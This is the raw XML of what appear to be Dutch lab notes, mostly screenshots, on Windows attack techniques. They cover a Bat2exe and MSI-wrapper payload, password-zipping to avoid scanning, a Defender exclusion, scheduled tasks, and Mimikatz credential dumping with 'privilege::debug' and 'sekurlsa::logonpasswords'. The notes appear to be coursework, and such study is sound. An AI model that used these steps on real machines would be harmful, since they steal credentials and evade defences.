    <w:p w14:paraId="7BF8A7C7" w14:textId="2F57F40E" w:rsidR="004376EC" w:rsidRDefault="00ED1314" w:rsidP="001740CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bat2exe -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2853E470" w14:textId="5CC1C281" w:rsidR="00ED1314" w:rsidRDefault="00ED1314" w:rsidP="001740CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED1314">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="104FA40F" wp14:editId="5A559B14">
            <wp:extent cx="3781953" cy="4544059"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="578330131" name="Afbeelding 1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0131" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, nummer, Lettertyp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F18" w14:textId="027C896A" w:rsidR="002945BC" w:rsidRDefault="002945BC" w:rsidP="001740CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002945BC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EB0494C" wp14:editId="10DAD5AD">
            <wp:extent cx="5760720" cy="1628140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="428759387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59387" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertype, lijn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0D" w14:textId="2C874926" w:rsidR="002945BC" w:rsidRDefault="002945BC" w:rsidP="001740CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002945BC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D0DF285" wp14:editId="7B1DCF99">
            <wp:extent cx="3905795" cy="1771897"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="916544893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44893" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertype, lijn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562" w14:textId="729AA5F7" w:rsidR="002945BC" w:rsidRDefault="002945BC" w:rsidP="001740CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002945BC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31DDDE75" wp14:editId="27ABED5F">
            <wp:extent cx="5410955" cy="4477375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1463866286" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, menu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6286" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, menu, Lettertyp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9857" w14:textId="24C437B7" w:rsidR="00A13640" w:rsidRDefault="002945BC" w:rsidP="001740CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MSI wrapper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321CEE43" w14:textId="7C649520" w:rsidR="002945BC" w:rsidRDefault="002945BC" w:rsidP="001740CA">
      <w:r w:rsidRPr="002945BC">
        <w:t>Eventueel vooraf maken, .zip + w</w:t>
      </w:r>
      <w:r>
        <w:t>achtwoord eventueel zodat het niet gescand wordt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E40816F" w14:textId="2918335B" w:rsidR="002945BC" w:rsidRDefault="00132050" w:rsidP="001740CA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Elevation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>always</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0CFACCFA" w14:textId="188535E7" w:rsidR="00132050" w:rsidRDefault="00132050" w:rsidP="001740CA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> new code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270F6716" w14:textId="7940CA5D" w:rsidR="00132050" w:rsidRDefault="00132050" w:rsidP="001740CA">
      <w:r w:rsidRPr="00132050">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45A0580E" wp14:editId="08382E24">
            <wp:extent cx="5760720" cy="1324610"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1584380260" name="Afbeelding 1" descr="Afbeelding met tekst, Lettertyp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80260" name="Afbeelding 1" descr="Afbeelding met tekst, Lettertype, nummer, schermopnam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1B6" w14:textId="77777777" w:rsidR="00132050" w:rsidRDefault="00132050" w:rsidP="001740CA"/>
    <w:p w14:paraId="573ABB8C" w14:textId="43ABCE18" w:rsidR="00132050" w:rsidRDefault="00132050" w:rsidP="001740CA">
      <w:r w:rsidRPr="00132050">
        <w:t>Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00132050">
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00132050">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00132050">
        <w:t>RemoteSigned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="611A6676" w14:textId="573A4EC7" w:rsidR="00132050" w:rsidRDefault="00132050" w:rsidP="001740CA">
      <w:r w:rsidRPr="00132050">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72ED0726" wp14:editId="7F4D8211">
            <wp:extent cx="5760720" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1753983197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3197" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertype, lijn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DF3A" w14:textId="07269E46" w:rsidR="00132050" w:rsidRPr="002945BC" w:rsidRDefault="00132050" w:rsidP="001740CA">
      <w:r w:rsidRPr="00132050">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F929268" wp14:editId="65079BB6">
            <wp:extent cx="4420217" cy="1457528"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="167082188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1889" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertype, lijn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D9B1" w14:textId="44EFA17B" w:rsidR="00B128EC" w:rsidRPr="002945BC" w:rsidRDefault="008053CE">
      <w:r w:rsidRPr="008053CE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3812B663" wp14:editId="3DF68A8F">
            <wp:extent cx="5760720" cy="1483360"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1396097101" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, softwar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7101" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, software, lijn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5467" w14:textId="4BF706C8" w:rsidR="00B128EC" w:rsidRDefault="006250DF">
      <w:r w:rsidRPr="006250DF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ECC03A4" wp14:editId="66D724E1">
            <wp:extent cx="5760720" cy="3197225"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1187973449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3449" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, software, nummer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AB01" w14:textId="2F5661EF" w:rsidR="006250DF" w:rsidRDefault="006250DF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Zou niet moeten mogen, zouden alleen administrators </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aanmogen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Poor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> systemmanagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0012A963" w14:textId="0305DE50" w:rsidR="006250DF" w:rsidRDefault="00B5718A">
      <w:r w:rsidRPr="00B5718A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="132E43F6" wp14:editId="46DAD449">
            <wp:extent cx="5760720" cy="660400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="320349241" name="Afbeelding 1" descr="Afbeelding met tekst, lijn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9241" name="Afbeelding 1" descr="Afbeelding met tekst, lijn, Lettertype, schermopnam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BBB3" w14:textId="14B2B983" w:rsidR="00B5718A" w:rsidRDefault="00B5718A">
      <w:r w:rsidRPr="00B5718A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27838892" wp14:editId="2D56EA12">
            <wp:extent cx="5760720" cy="1718945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1203788162" name="Afbeelding 1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8162" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, nummer, Lettertyp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A106" w14:textId="0D78AB09" w:rsidR="00B5718A" w:rsidRDefault="00B5718A">
      <w:r w:rsidRPr="00B5718A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="694638EE" wp14:editId="1C2BEF94">
            <wp:extent cx="5760720" cy="2153920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1156063271" name="Afbeelding 1" descr="Afbeelding met tekst, softwar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3271" name="Afbeelding 1" descr="Afbeelding met tekst, software, nummer, schermopname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78F5" w14:textId="7D35D581" w:rsidR="00B5718A" w:rsidRDefault="00E3519B">
      <w:r w:rsidRPr="00E3519B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="154CADD4" wp14:editId="6E058F43">
            <wp:extent cx="5760720" cy="3611245"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1969683658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83658" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, software, nummer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BBDE" w14:textId="2BDFAEAE" w:rsidR="00E3519B" w:rsidRDefault="00E3519B">
      <w:r w:rsidRPr="00E3519B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F3D2380" wp14:editId="223D3387">
            <wp:extent cx="5760720" cy="826770"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1597722358" name="Afbeelding 1" descr="Afbeelding met schermopname, tekst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22358" name="Afbeelding 1" descr="Afbeelding met schermopname, tekst, lijn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570" w14:textId="5D5E3B79" w:rsidR="00E3519B" w:rsidRDefault="008D3490">
      <w:r>
        <w:t>Netcheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3BDDB2" w14:textId="72AB6B99" w:rsidR="008D3490" w:rsidRDefault="008D3490">
      <w:r>
        <w:t>Mytask2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3527AD5B" w14:textId="06661A94" w:rsidR="008D3490" w:rsidRDefault="008D3490">
      <w:r w:rsidRPr="008D3490">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1616575E" wp14:editId="675A7B9C">
            <wp:extent cx="5760720" cy="3865880"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="239616394" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertype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16394" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertype, documen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918A" w14:textId="19F0AA5D" w:rsidR="008D3490" w:rsidRDefault="008D3490">
      <w:r w:rsidRPr="008D3490">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40C47F09" wp14:editId="7F6A5654">
            <wp:extent cx="5760720" cy="2045970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="284865024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5024" name="Afbeelding 1" descr="Afbeelding met tekst, nummer, Lettertype, software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112" w14:textId="27019C10" w:rsidR="008D3490" w:rsidRDefault="008D3490">
      <w:r w:rsidRPr="008D3490">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03CCD63A" wp14:editId="362047A8">
            <wp:extent cx="5760720" cy="951230"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1988840351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40351" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, lijn, Lettertype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DEAB" w14:textId="75DCEE7A" w:rsidR="002D1E7F" w:rsidRDefault="002D1E7F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Als admin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exclusion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> toevoegen bij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defender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="676EE329" w14:textId="1E15D8F4" w:rsidR="008D3490" w:rsidRDefault="002D1E7F">
      <w:r w:rsidRPr="002D1E7F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4730CD20" wp14:editId="1E2CEE08">
            <wp:extent cx="5760720" cy="2920365"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="613579904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9904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420" w14:textId="51A94D85" w:rsidR="002D1E7F" w:rsidRDefault="002D1E7F">
      <w:r w:rsidRPr="002D1E7F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="670FBE02" wp14:editId="7D84C2DA">
            <wp:extent cx="5760720" cy="2966085"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1921553933" name="Afbeelding 1" descr="Afbeelding met tekst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53933" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, nummer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8FA" w14:textId="56C3F2D7" w:rsidR="002D1E7F" w:rsidRDefault="002D1E7F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Credential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0179D186" w14:textId="12640603" w:rsidR="002D1E7F" w:rsidRDefault="002D1E7F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimekatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2851EBBE" w14:textId="75E842B6" w:rsidR="002D1E7F" w:rsidRDefault="002D1E7F">
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Releases · </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>gentilkiwi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mimikatz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C1BAE39" w14:textId="459B333C" w:rsidR="002D1E7F" w:rsidRDefault="00B520CB">
      <w:r w:rsidRPr="00B520CB">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E0957AA" wp14:editId="2EC93338">
            <wp:extent cx="5760720" cy="2541905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="263552888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52888" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertype, software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0F5E" w14:textId="4A7A3A32" w:rsidR="00B520CB" w:rsidRDefault="00B520CB">
      <w:r>
        <w:t>Eerste commando: privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7607DA7A" w14:textId="15565689" w:rsidR="00B520CB" w:rsidRDefault="00B520CB">
      <w:r w:rsidRPr="00B520CB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C428469" wp14:editId="0C5EFE1E">
            <wp:extent cx="5760720" cy="1829435"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="103345231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2315" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertype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E669" w14:textId="7448A097" w:rsidR="00B520CB" w:rsidRDefault="00B520CB">
      <w:r>
        <w:t>goed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3702872C" w14:textId="6CA2A7E0" w:rsidR="00B520CB" w:rsidRDefault="00B520CB">
      <w:r w:rsidRPr="00B520CB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="370F2A39" wp14:editId="35C6A790">
            <wp:extent cx="5760720" cy="2468880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="96774629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46297" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertype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AC" w14:textId="6FD709FC" w:rsidR="00B520CB" w:rsidRDefault="00B520CB">
      <w:r>
        <w:t>fout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A3204A" w14:textId="2901B29E" w:rsidR="002D1E7F" w:rsidRDefault="00B520CB">
      <w:r>
        <w:t xml:space="preserve">commando 2: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>logonpasswords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08B394BD" w14:textId="1A91DB66" w:rsidR="00B520CB" w:rsidRDefault="00B520CB">
      <w:r w:rsidRPr="00B520CB">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="689AA408" wp14:editId="0F93A7CB">
            <wp:extent cx="5268060" cy="4267796"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="115010784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7849" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertype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251" w14:textId="1EB6C95D" w:rsidR="00B520CB" w:rsidRDefault="00B520CB">
      <w:r w:rsidRPr="00B520CB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6557C7E1" wp14:editId="739BED6F">
            <wp:extent cx="5477639" cy="3915321"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="4636307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078" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertype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128E" w14:textId="4F590A4E" w:rsidR="00B520CB" w:rsidRDefault="00B520CB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Deze credentials komen uit geheugen, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cached</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> login credentials van machines die gekoppeld zijn aan een domein (10 laatste </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>logins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MSCache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> wordt gebruikt voor versleuteling (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>salted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> met gebruikersnaam). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626A2E84" w14:textId="2B6E55BB" w:rsidR="0052489D" w:rsidRDefault="0052489D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>credman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D462934" w14:textId="72FB3EB9" w:rsidR="0052489D" w:rsidRDefault="0052489D">
      <w:r w:rsidRPr="0052489D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BA230E0" wp14:editId="7E566D09">
            <wp:extent cx="5760720" cy="4164330"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="45289831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8313" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertype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3324" w14:textId="4EAD7952" w:rsidR="0052489D" w:rsidRDefault="0052489D">
      <w:r w:rsidRPr="0052489D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70141926" wp14:editId="4FF17E9D">
            <wp:extent cx="5760720" cy="3522345"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="713901953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1953" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, software, Webpagina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586A" w14:textId="0E330E58" w:rsidR="0052489D" w:rsidRDefault="0052489D">
      <w:r w:rsidRPr="0052489D">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57BA0C40" wp14:editId="1774DBA1">
            <wp:extent cx="4934639" cy="3077004"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="101381738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7385" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertype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ADAA" w14:textId="2E3C28FC" w:rsidR="0052489D" w:rsidRDefault="0052489D">
      <w:r w:rsidRPr="0052489D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54FD04A4" wp14:editId="09A7F128">
            <wp:extent cx="4363059" cy="1838582"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="112350345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03459" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertype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5ED" w14:textId="5990044E" w:rsidR="0052489D" w:rsidRDefault="0052489D">
      <w:r>
        <w:t xml:space="preserve">Kijken naar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>creation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inclusions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zoals bij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defender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0478CDBA" w14:textId="77777777" w:rsidR="0052489D" w:rsidRDefault="0052489D"/>
    <w:p w14:paraId="6F262F65" w14:textId="77777777" w:rsidR="0052489D" w:rsidRPr="002945BC" w:rsidRDefault="0052489D"/>
    <w:sectPr w:rsidR="0052489D" w:rsidRPr="002945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C7025"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9574EED6"/>
    <w:lvl w:ilvl="0" w:tplc="80C475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93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8D"/>
    <w:rsid w:val="000112E8"/>
    <w:rsid w:val="00076F44"/>
    <w:rsid w:val="00091330"/>
    <w:rsid w:val="00096530"/>
    <w:rsid w:val="00113DC4"/>
    <w:rsid w:val="00117FCD"/>
    <w:rsid w:val="00132050"/>
    <w:rsid w:val="00136D5F"/>
    <w:rsid w:val="001464F3"/>
    <w:rsid w:val="00167D87"/>
    <w:rsid w:val="001740CA"/>
    <w:rsid w:val="00182DF4"/>
    <w:rsid w:val="00186DE0"/>
    <w:rsid w:val="001A5DB9"/>
    <w:rsid w:val="00234E0B"/>
    <w:rsid w:val="00280A78"/>
    <w:rsid w:val="002945BC"/>
    <w:rsid w:val="002A12BB"/>
    <w:rsid w:val="002D1E7F"/>
    <w:rsid w:val="002F64A9"/>
    <w:rsid w:val="0030734B"/>
    <w:rsid w:val="0031324D"/>
    <w:rsid w:val="003227E8"/>
    <w:rsid w:val="00334137"/>
    <w:rsid w:val="003402A0"/>
    <w:rsid w:val="00372AA2"/>
    <w:rsid w:val="00383040"/>
    <w:rsid w:val="003B671A"/>
    <w:rsid w:val="003E1BDE"/>
    <w:rsid w:val="004376EC"/>
    <w:rsid w:val="00464E03"/>
    <w:rsid w:val="0052489D"/>
    <w:rsid w:val="005367FF"/>
    <w:rsid w:val="00560519"/>
    <w:rsid w:val="00577B65"/>
    <w:rsid w:val="00590ADB"/>
    <w:rsid w:val="005E08FF"/>
    <w:rsid w:val="006250DF"/>
    <w:rsid w:val="006333F5"/>
    <w:rsid w:val="00682455"/>
    <w:rsid w:val="006C267D"/>
    <w:rsid w:val="006D4D60"/>
    <w:rsid w:val="00723F70"/>
    <w:rsid w:val="007C4DBB"/>
    <w:rsid w:val="007C5468"/>
    <w:rsid w:val="007F74F3"/>
    <w:rsid w:val="008051C4"/>
    <w:rsid w:val="008053CE"/>
    <w:rsid w:val="00831BBD"/>
    <w:rsid w:val="00844DEF"/>
    <w:rsid w:val="00855D73"/>
    <w:rsid w:val="00875FD0"/>
    <w:rsid w:val="00886A30"/>
    <w:rsid w:val="008B6FB5"/>
    <w:rsid w:val="008D0C4C"/>
    <w:rsid w:val="008D3490"/>
    <w:rsid w:val="0096280F"/>
    <w:rsid w:val="00971852"/>
    <w:rsid w:val="009B461E"/>
    <w:rsid w:val="00A05E3C"/>
    <w:rsid w:val="00A13640"/>
    <w:rsid w:val="00AA3628"/>
    <w:rsid w:val="00AE47B5"/>
    <w:rsid w:val="00B128EC"/>
    <w:rsid w:val="00B3568D"/>
    <w:rsid w:val="00B520CB"/>
    <w:rsid w:val="00B532C3"/>
    <w:rsid w:val="00B5718A"/>
    <w:rsid w:val="00BB7C5C"/>
    <w:rsid w:val="00BC3FE4"/>
    <w:rsid w:val="00BE2E52"/>
    <w:rsid w:val="00C238F3"/>
    <w:rsid w:val="00C51A66"/>
    <w:rsid w:val="00CB5248"/>
    <w:rsid w:val="00CE15A1"/>
    <w:rsid w:val="00CE2815"/>
    <w:rsid w:val="00D45F8E"/>
    <w:rsid w:val="00D558C1"/>
    <w:rsid w:val="00D63363"/>
    <w:rsid w:val="00D81080"/>
    <w:rsid w:val="00DC02CB"/>
    <w:rsid w:val="00DF3D55"/>
    <w:rsid w:val="00DF56BB"/>
    <w:rsid w:val="00E01D0A"/>
    <w:rsid w:val="00E26CAF"/>
    <w:rsid w:val="00E3519B"/>
    <w:rsid w:val="00E61510"/>
    <w:rsid w:val="00ED1314"/>
    <w:rsid w:val="00F301A0"/>
    <w:rsid w:val="00F92ABD"/>
    <w:rsid w:val="00FB61E3"/>
    <w:rsid w:val="00FC32D2"/>
    <w:rsid w:val="00FD083C"/>
    <w:rsid w:val="00FD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FEEBB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0C0581B0-3564-4647-94BE-6F8512948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13DC4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2D1E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github.com/gentilkiwi/mimikatz/releases" TargetMode="External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18</Pages>
  <Words>530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Rody Jordens</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rody Jordens</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-27T09:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-17T12:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>